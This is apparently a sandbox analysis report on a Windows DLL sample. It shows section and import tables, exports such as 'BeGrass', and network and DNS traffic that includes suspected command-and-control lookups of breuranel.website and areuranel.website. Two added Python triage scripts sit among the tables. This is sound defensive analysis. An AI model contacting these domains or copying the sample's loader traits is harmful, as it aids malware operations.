                                                                                          Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                                          .text   0x1000           0x79f71       0x7a000   False     0.510071801358   data       6.75462598911  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rdata  0x7b000          0x2e586       0x2e600   False     0.556366871631   data       5.60177209336  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data   0xaa000          0x9b19c       0x1800    False     0.190266927083   data       4.15778005426  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                          .reloc  0x146000         0x53d0        0x5400    False     0.752650669643   data       6.72453697464  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Imports

                                                                                          DLLImport
                                                                                          KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                          USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                          MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                          Exports

                                                                                          NameOrdinalAddress
                                                                                          BeGrass10x10016020
                                                                                          Fieldeight20x100162f0
                                                                                          Often30x10016510
                                                                                          Townenter40x100167a0
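
The section and export tables above, worked through as an added example that is not part of this report and not code from the sample: a short Python triage that flags sections whose in-memory size far exceeds their on-disk size (here .data reserves 0x9b19c bytes but carries only 0x1800 bytes of raw data), checks for writable-and-executable sections and high entropy, and maps each export to the section that contains it, resolving an ordinal the way rundll32's '<dll>,#N' argument does. Section and export values are copied from the tables; the 0x10000000 image base is an assumption inferred from the export addresses, and the ratio and entropy thresholds are triage heuristics chosen here, not published cut-offs.

```python
# Added example, not part of the Joe Sandbox report: encodes the checks an
# analyst applies to the section and export tables. Values are copied from
# the report; IMAGE_BASE and the thresholds below are assumptions.
IMAGE_BASE = 0x10000000  # assumption: implied by export addresses such as 0x10016020

# (name, virtual address, virtual size, raw size, entropy, characteristics)
SECTIONS = [
    (".text",  0x1000,   0x79f71, 0x7a000, 6.75462598911,
     {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_READ"}),
    (".rdata", 0x7b000,  0x2e586, 0x2e600, 5.60177209336,
     {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"}),
    (".data",  0xaa000,  0x9b19c, 0x1800,  4.15778005426,
     {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_READ"}),
    (".reloc", 0x146000, 0x53d0,  0x5400,  6.72453697464,
     {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE", "IMAGE_SCN_MEM_READ"}),
]

# (name, ordinal, virtual address) from the Exports table
EXPORTS = [
    ("BeGrass",    1, 0x10016020),
    ("Fieldeight", 2, 0x100162f0),
    ("Often",      3, 0x10016510),
    ("Townenter",  4, 0x100167a0),
]


def triage_sections(sections, ratio_threshold=8.0, entropy_threshold=7.0):
    """Return (section, finding, detail) tuples for common loader/packer tells.

    A writable section whose virtual size dwarfs its raw size is room the
    code can fill at run time (an unpacking or decryption buffer); a large
    BSS-style block of uninitialised data looks the same, so treat the hit
    as a lead to follow in a debugger, not as a verdict.
    """
    findings = []
    for name, _va, vsize, rawsize, entropy, chars in sections:
        if {"IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_EXECUTE"} <= chars:
            findings.append((name, "writable_executable", "W+X section"))
        if rawsize == 0 and vsize > 0:
            findings.append((name, "no_raw_data", f"{vsize:#x} bytes exist only in memory"))
        elif rawsize and vsize / rawsize >= ratio_threshold:
            findings.append((name, "virtual_size_ratio",
                             f"virtual {vsize:#x} is {vsize / rawsize:.0f}x raw {rawsize:#x}"))
        if entropy >= entropy_threshold:
            findings.append((name, "high_entropy", f"{entropy:.2f} bits/byte"))
    return findings


def section_for_rva(sections, rva):
    """Name of the section whose in-memory span contains the RVA, else None."""
    for name, va, vsize, rawsize, _entropy, _chars in sections:
        if va <= rva < va + max(vsize, rawsize):
            return name
    return None


def locate_exports(sections, exports, image_base=IMAGE_BASE):
    """Map each export name to (ordinal, RVA, containing section)."""
    located = {}
    for name, ordinal, address in exports:
        rva = address - image_base
        located[name] = (ordinal, rva, section_for_rva(sections, rva))
    return located


def export_for_ordinal(exports, ordinal):
    """Resolve an ordinal the way rundll32's '<dll>,#N' argument does."""
    for name, ord_, _address in exports:
        if ord_ == ordinal:
            return name
    return None


if __name__ == "__main__":
    for finding in triage_sections(SECTIONS):
        print("section finding:", finding)
    for name, (ordinal, rva, section) in locate_exports(SECTIONS, EXPORTS).items():
        print(f"export {name} (#{ordinal}) at RVA {rva:#x} in {section}")
    print("ordinal 1 resolves to:", export_for_ordinal(EXPORTS, 1))
```

With the values above the only hit is .data, whose virtual size is roughly a hundred times its raw size; all four exports sit inside .text, within a few hundred bytes of each other. The ratio check on its own does not prove unpacking, since a compiler that merges uninitialised data into .data produces the same shape, but it is a reason to dump that region after the sample has run.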

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Oct 11, 2021 22:50:22.477772951 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.477812052 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:22.479016066 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.511131048 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.511164904 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:22.590322971 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.590380907 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:22.590491056 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.599661112 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.599700928 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:22.830621004 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:22.830780029 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.843853951 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.843878031 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:22.844290972 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:22.915033102 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:22.915242910 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:22.968174934 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:23.075587034 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:23.075615883 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:23.075884104 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:23.171344995 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:23.709528923 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:23.755141020 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:23.823232889 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:23.825589895 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:23.830543995 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:23.839725018 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:23.839776993 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:23.839807034 CEST  49765        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:23.839818001 CEST  443          49765      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:23.898751020 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:23.939150095 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:24.014254093 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:24.014353991 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:24.014559031 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:24.430315018 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:24.430345058 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:50:24.430403948 CEST  49766        443        192.168.2.5    13.82.28.61
Oct 11, 2021 22:50:24.430413008 CEST  443          49766      13.82.28.61    192.168.2.5
Oct 11, 2021 22:51:06.365499020 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:06.365540028 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:06.365628958 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:06.366198063 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:06.366214037 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:06.877902031 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:06.890742064 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:06.896148920 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:06.896168947 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:06.896533966 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:06.899832964 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:06.943133116 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:07.066915035 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:07.066991091 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:07.067071915 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:07.067372084 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:07.067388058 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:07.067486048 CEST  49785        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:07.067492962 CEST  443          49785      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:07.096896887 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.096926928 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.097018957 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.097615957 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.097629070 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.169291019 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.169390917 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.171653986 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.171675920 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.172300100 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.174639940 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.195985079 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.196054935 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.196113110 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.197937012 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.197966099 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.197977066 CEST  49786        443        192.168.2.5    52.98.152.242
Oct 11, 2021 22:51:07.197985888 CEST  443          49786      52.98.152.242  192.168.2.5
Oct 11, 2021 22:51:07.219775915 CEST  49787        443        192.168.2.5    52.97.137.242
Oct 11, 2021 22:51:07.219815969 CEST  443          49787      52.97.137.242  192.168.2.5
Oct 11, 2021 22:51:07.219933033 CEST  49787        443        192.168.2.5    52.97.137.242
Oct 11, 2021 22:51:07.220530987 CEST  49787        443        192.168.2.5    52.97.137.242
Oct 11, 2021 22:51:07.220550060 CEST  443          49787      52.97.137.242  192.168.2.5
Oct 11, 2021 22:51:07.235893965 CEST  49788        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:07.235935926 CEST  443          49788      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:07.236211061 CEST  49788        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:07.236603975 CEST  49788        443        192.168.2.5    40.97.161.50
Oct 11, 2021 22:51:07.236620903 CEST  443          49788      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:07.318660975 CEST  443          49787      52.97.137.242  192.168.2.5
Oct 11, 2021 22:51:07.319047928 CEST  49787        443        192.168.2.5    52.97.137.242
Oct 11, 2021 22:51:07.321105003 CEST  49787        443        192.168.2.5    52.97.137.242
Oct 11, 2021 22:51:07.321119070 CEST  443          49787      52.97.137.242  192.168.2.5
Oct 11, 2021 22:51:07.321414948 CEST  443          49787      52.97.137.242  192.168.2.5
Oct 11, 2021 22:51:07.323396921 CEST  49787        443        192.168.2.5    52.97.137.242
Oct 11, 2021 22:51:07.360156059 CEST  443          49787      52.97.137.242  192.168.2.5
Oct 11, 2021 22:51:07.360233068 CEST  443          49787      52.97.137.242  192.168.2.5
Oct 11, 2021 22:51:07.360301018 CEST  49787        443        192.168.2.5    52.97.137.242
Oct 11, 2021 22:51:07.360649109 CEST  49787        443        192.168.2.5    52.97.137.242
Oct 11, 2021 22:51:07.360671043 CEST  443          49787      52.97.137.242  192.168.2.5
Oct 11, 2021 22:51:07.745934010 CEST  443          49788      40.97.161.50   192.168.2.5
Oct 11, 2021 22:51:07.746094942 CEST  49788        443        192.168.2.5    40.97.161.50

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Oct 11, 2021 22:50:22.437870979 CEST  52441        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:50:22.459774971 CEST  53           52441      8.8.8.8        192.168.2.5
Oct 11, 2021 22:50:22.550457001 CEST  62176        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:50:22.569350004 CEST  53           62176      8.8.8.8        192.168.2.5
Oct 11, 2021 22:50:23.889962912 CEST  59596        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:50:24.435796976 CEST  65296        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:50:46.273989916 CEST  60075        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:50:46.295051098 CEST  53           60075      8.8.8.8        192.168.2.5
Oct 11, 2021 22:50:46.829330921 CEST  55016        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:50:46.849863052 CEST  53           55016      8.8.8.8        192.168.2.5
Oct 11, 2021 22:51:06.345551968 CEST  50394        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:51:06.363910913 CEST  53           50394      8.8.8.8        192.168.2.5
Oct 11, 2021 22:51:07.075432062 CEST  58530        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:51:07.095448971 CEST  53           58530      8.8.8.8        192.168.2.5
Oct 11, 2021 22:51:07.202419996 CEST  53813        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:51:07.216661930 CEST  63732        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:51:07.218367100 CEST  53           53813      8.8.8.8        192.168.2.5
Oct 11, 2021 22:51:07.234621048 CEST  53           63732      8.8.8.8        192.168.2.5
Oct 11, 2021 22:51:07.927795887 CEST  57344        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:51:07.945739031 CEST  53           57344      8.8.8.8        192.168.2.5
Oct 11, 2021 22:51:08.106379986 CEST  54450        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:51:08.124209881 CEST  53           54450      8.8.8.8        192.168.2.5
Oct 11, 2021 22:51:27.478935003 CEST  60516        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:51:27.497742891 CEST  53           60516      8.8.8.8        192.168.2.5
Oct 11, 2021 22:51:28.616483927 CEST  51649        53         192.168.2.5    8.8.8.8
Oct 11, 2021 22:51:28.635253906 CEST  53           51649      8.8.8.8        192.168.2.5

DNS Queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                   Type            Class
Oct 11, 2021 22:50:22.437870979 CEST  192.168.2.5  8.8.8.8  0x9bac    Standard query (0)  msn.com                A (IP address)  IN (0x0001)
Oct 11, 2021 22:50:22.550457001 CEST  192.168.2.5  8.8.8.8  0xdaf     Standard query (0)  msn.com                A (IP address)  IN (0x0001)
Oct 11, 2021 22:50:23.889962912 CEST  192.168.2.5  8.8.8.8  0xdaf9    Standard query (0)  www.msn.com            A (IP address)  IN (0x0001)
Oct 11, 2021 22:50:24.435796976 CEST  192.168.2.5  8.8.8.8  0xfbd4    Standard query (0)  www.msn.com            A (IP address)  IN (0x0001)
Oct 11, 2021 22:50:46.273989916 CEST  192.168.2.5  8.8.8.8  0x61bd    Standard query (0)  breuranel.website      A (IP address)  IN (0x0001)
Oct 11, 2021 22:50:46.829330921 CEST  192.168.2.5  8.8.8.8  0x427a    Standard query (0)  breuranel.website      A (IP address)  IN (0x0001)
Oct 11, 2021 22:51:06.345551968 CEST  192.168.2.5  8.8.8.8  0xdfb3    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
Oct 11, 2021 22:51:07.075432062 CEST  192.168.2.5  8.8.8.8  0xdf9c    Standard query (0)  www.outlook.com        A (IP address)  IN (0x0001)
Oct 11, 2021 22:51:07.202419996 CEST  192.168.2.5  8.8.8.8  0x348e    Standard query (0)  outlook.office365.com  A (IP address)  IN (0x0001)
Oct 11, 2021 22:51:07.216661930 CEST  192.168.2.5  8.8.8.8  0x62a1    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
Oct 11, 2021 22:51:07.927795887 CEST  192.168.2.5  8.8.8.8  0xd20a    Standard query (0)  www.outlook.com        A (IP address)  IN (0x0001)
Oct 11, 2021 22:51:08.106379986 CEST  192.168.2.5  8.8.8.8  0x3597    Standard query (0)  outlook.office365.com  A (IP address)  IN (0x0001)
Oct 11, 2021 22:51:27.478935003 CEST  192.168.2.5  8.8.8.8  0x5457    Standard query (0)  areuranel.website      A (IP address)  IN (0x0001)
Oct 11, 2021 22:51:28.616483927 CEST  192.168.2.5  8.8.8.8  0xa4f3    Standard query (0)  areuranel.website      A (IP address)  IN (0x0001)
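
The packet and DNS tables of this report, cross-referenced as an added example that is not part of the report: the script pairs each DNS answer with its query by transaction ID, collects the A records every queried name received, separates the names that came back NXDOMAIN, and then checks each outbound TCP destination against those answers so that a connection to an address no lookup explained stands out. The three inputs are constructed here as tab-separated subsets of the report's own rows (the report shows them as tables, not TSV); the answer rows for areuranel.website are not reproduced in this excerpt, so that name is left out of the constructed data. The local subnet 192.168.2.0/24 and the resolver address are taken from those rows.

```python
# Added example, not part of the Joe Sandbox report: ties the TCP packet,
# DNS query and DNS answer tables together. All three inputs are constructed
# here as tab-separated subsets of the rows shown in the report.
import ipaddress
from collections import defaultdict

# timestamp, source port, dest port, source IP, dest IP
TCP_PACKETS = """\
Oct 11, 2021 22:50:22.477772951 CEST\t49765\t443\t192.168.2.5\t13.82.28.61
Oct 11, 2021 22:50:22.477812052 CEST\t443\t49765\t13.82.28.61\t192.168.2.5
Oct 11, 2021 22:51:06.365499020 CEST\t49785\t443\t192.168.2.5\t40.97.161.50
Oct 11, 2021 22:51:07.096896887 CEST\t49786\t443\t192.168.2.5\t52.98.152.242
Oct 11, 2021 22:51:07.219775915 CEST\t49787\t443\t192.168.2.5\t52.97.137.242
"""

# timestamp, source IP, dest IP, transaction ID, opcode, name, type, class
DNS_QUERIES = """\
Oct 11, 2021 22:50:22.437870979 CEST\t192.168.2.5\t8.8.8.8\t0x9bac\tStandard query (0)\tmsn.com\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:50:23.889962912 CEST\t192.168.2.5\t8.8.8.8\t0xdaf9\tStandard query (0)\twww.msn.com\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:50:46.273989916 CEST\t192.168.2.5\t8.8.8.8\t0x61bd\tStandard query (0)\tbreuranel.website\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:51:06.345551968 CEST\t192.168.2.5\t8.8.8.8\t0xdfb3\tStandard query (0)\toutlook.com\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:51:07.075432062 CEST\t192.168.2.5\t8.8.8.8\t0xdf9c\tStandard query (0)\twww.outlook.com\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:51:07.202419996 CEST\t192.168.2.5\t8.8.8.8\t0x348e\tStandard query (0)\toutlook.office365.com\tA (IP address)\tIN (0x0001)
"""

# timestamp, source IP, dest IP, transaction ID, reply code, name, cname, address, type, class
DNS_ANSWERS = """\
Oct 11, 2021 22:50:22.459774971 CEST\t8.8.8.8\t192.168.2.5\t0x9bac\tNo error (0)\tmsn.com\t\t13.82.28.61\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:50:23.907807112 CEST\t8.8.8.8\t192.168.2.5\t0xdaf9\tNo error (0)\twww.msn.com\twww-msn-com.a-0003.a-msedge.net\t\tCNAME (Canonical name)\tIN (0x0001)
Oct 11, 2021 22:50:46.295051098 CEST\t8.8.8.8\t192.168.2.5\t0x61bd\tName error (3)\tbreuranel.website\tnone\tnone\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST\t8.8.8.8\t192.168.2.5\t0xdfb3\tNo error (0)\toutlook.com\t\t40.97.161.50\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST\t8.8.8.8\t192.168.2.5\t0xdfb3\tNo error (0)\toutlook.com\t\t40.97.156.114\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST\t8.8.8.8\t192.168.2.5\t0xdf9c\tNo error (0)\twww.outlook.com\toutlook.office365.com\t\tCNAME (Canonical name)\tIN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST\t8.8.8.8\t192.168.2.5\t0xdf9c\tNo error (0)\tHHN-efz.ms-acdc.office.com\t\t52.98.152.242\tA (IP address)\tIN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST\t8.8.8.8\t192.168.2.5\t0x348e\tNo error (0)\tFRA-efz.ms-acdc.office.com\t\t52.97.137.242\tA (IP address)\tIN (0x0001)
"""


def parse_tsv(text):
    """Split a tab-separated table dump into rows, keeping empty cells."""
    return [line.split("\t") for line in text.strip("\n").splitlines() if line]


def summarize(tcp_text, query_text, answer_text,
              local_net="192.168.2.0/24", resolver="8.8.8.8"):
    """Attribute every external TCP peer to the DNS name that produced it."""
    local = ipaddress.ip_network(local_net)

    queried = {}  # transaction ID -> name the sample asked for
    for _ts, _src, _dst, tid, _op, name, _rtype, _cls in parse_tsv(query_text):
        queried[tid] = name

    nxdomain, answered = set(), set()
    addresses = defaultdict(set)  # queried name -> A records in its answer
    for _ts, _src, _dst, tid, rcode, _name, _cname, address, rtype, _cls in parse_tsv(answer_text):
        qname = queried.get(tid)
        if qname is None:
            continue  # answer for a query not present in this excerpt
        if rcode.startswith("Name error"):
            nxdomain.add(qname)
            continue
        answered.add(qname)
        # A records in an answer belong to the queried name, whatever CNAME
        # chain the resolver walked to reach them.
        if rtype.startswith("A ") and address and address != "none":
            addresses[qname].add(address)

    ip_to_names = defaultdict(set)
    for qname, addrs in addresses.items():
        for addr in addrs:
            ip_to_names[addr].add(qname)

    contacted = {}  # external destination IP -> names that resolved to it
    for _ts, _sport, _dport, src, dst in parse_tsv(tcp_text):
        src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if src_ip in local and dst_ip not in local and dst != resolver:
            contacted[dst] = sorted(ip_to_names.get(dst, ()))

    return {
        "nxdomain": sorted(nxdomain),
        "resolved": {n: sorted(a) for n, a in addresses.items()},
        "cname_only": sorted(answered - set(addresses)),  # answered, but no A record in the excerpt
        "contacted": contacted,
        "unexplained": sorted(ip for ip, names in contacted.items() if not names),
    }


if __name__ == "__main__":
    result = summarize(TCP_PACKETS, DNS_QUERIES, DNS_ANSWERS)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run against this subset, every external TCP peer traces back to an msn.com or outlook.com lookup and the "unexplained" list is empty; the only name that failed to resolve is breuranel.website, and www.msn.com lands in "cname_only" because the excerpt shows its CNAME but no A record. That split, resolved names versus names that never resolved versus peers with no DNS at all, is the first cut an analyst makes before deciding which entries from a sandbox run belong on a watchlist.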

DNS Answers

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code      Name                        CName                            Address        Type                    Class
Oct 11, 2021 22:50:22.459774971 CEST  8.8.8.8    192.168.2.5  0x9bac    No error (0)    msn.com                     -                                13.82.28.61    A (IP address)          IN (0x0001)
Oct 11, 2021 22:50:22.569350004 CEST  8.8.8.8    192.168.2.5  0xdaf     No error (0)    msn.com                     -                                13.82.28.61    A (IP address)          IN (0x0001)
Oct 11, 2021 22:50:23.907807112 CEST  8.8.8.8    192.168.2.5  0xdaf9    No error (0)    www.msn.com                 www-msn-com.a-0003.a-msedge.net  -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:50:24.454166889 CEST  8.8.8.8    192.168.2.5  0xfbd4    No error (0)    www.msn.com                 www-msn-com.a-0003.a-msedge.net  -              CNAME (Canonical name)  IN (0x0001)
Oct 11, 2021 22:50:46.295051098 CEST  8.8.8.8    192.168.2.5  0x61bd    Name error (3)  breuranel.website           none                             none           A (IP address)          IN (0x0001)
Oct 11, 2021 22:50:46.849863052 CEST  8.8.8.8    192.168.2.5  0x427a    Name error (3)  breuranel.website           none                             none           A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST  8.8.8.8    192.168.2.5  0xdfb3    No error (0)    outlook.com                 -                                40.97.161.50   A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST  8.8.8.8    192.168.2.5  0xdfb3    No error (0)    outlook.com                 -                                40.97.156.114  A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST  8.8.8.8    192.168.2.5  0xdfb3    No error (0)    outlook.com                 -                                40.97.160.2    A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST  8.8.8.8    192.168.2.5  0xdfb3    No error (0)    outlook.com                 -                                40.97.128.194  A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST  8.8.8.8    192.168.2.5  0xdfb3    No error (0)    outlook.com                 -                                40.97.164.146  A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST  8.8.8.8    192.168.2.5  0xdfb3    No error (0)    outlook.com                 -                                40.97.153.146  A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST  8.8.8.8    192.168.2.5  0xdfb3    No error (0)    outlook.com                 -                                40.97.116.82   A (IP address)          IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST  8.8.8.8    192.168.2.5  0xdfb3    No error (0)    outlook.com                 -                                40.97.148.226  A (IP address)          IN (0x0001)
